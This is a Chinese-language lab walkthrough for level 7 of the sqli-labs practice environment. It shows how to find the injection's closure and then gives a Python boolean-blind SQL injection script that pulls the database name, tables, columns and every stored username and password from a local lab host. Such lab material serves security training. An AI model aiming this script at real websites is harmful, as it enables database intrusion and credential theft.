7、第七关
id=1' --+单引号报错,id=1" --+双引号不报错,可以判断是单引号闭合
id=1') --+也报错,尝试两个括号闭合,id=1')) --+不报错
接下来用脚本爆库
import string
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ['~', "@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = False
url = "http://sqli.labs/Less-7/?id=1%27))%20"
if test:
print("test")
res = requests.get(url + "and%20length(database())>10%20--+")
content_length = len(res.text)
print(content_length)
else:
content_len = 691
list1 = numbers + letters2 + fuhao
print(len(list1))
len1 = 20
# 获取数据库名长度
db_length = 0
for i in range(50):
url_db = url + f"and%20length(database())={i}%20--+"
res = requests.get(url_db)
if "You are in.... Use outfile......" in res.text:
db_length = i
break
print(f"数据库名长度:{db_length}")
# 获取数据库名
database = ""
for p in range(db_length + 1):
for a in list1:
url_db = url + f"and%20substr(database(),{p},1)=%22{a}%22%20--+"
res = requests.get(url_db)
if "You are in.... Use outfile......" in res.text:
database = f"{database}{a}"
print(a, end='')
print(f",数据库:{database}")
# 获取所有表名
num = 0
tables = ""
for p in range(1000):
if num > len(list1)*2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)=\"{a}\"%20--+"
res = requests.get(url_db)
num += 1
if "You are in.... Use outfile......" in res.text:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print(f",所有表名:{tables}")
# 获取users表所有字段
columns = ""
num = 0
for p in range(1000):
if num > len(list1)*2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{p},1)=\"{a}\"%20--+"
res = requests.get(url_db)
num += 1
if "You are in.... Use outfile......" in res.text:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print(f",所有字段名:{columns}")
# 获取所有账号
users = ""
num = 0
for p in range(1000):
if num > len(list1)*2:
break
for a in list1:
url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=\"{a}\"%20--+"
res = requests.get(url_db)
num += 1
if "You are in.... Use outfile......" in res.text:
users = f"{users}{a}"
print(a, end='')
num = 0
print(f",所有用户密码:{users}")
![[ESP32 IDF] wifi 的应用](https://img-blog.csdnimg.cn/direct/c34225b0eea04112a2f97e188d02273a.png)
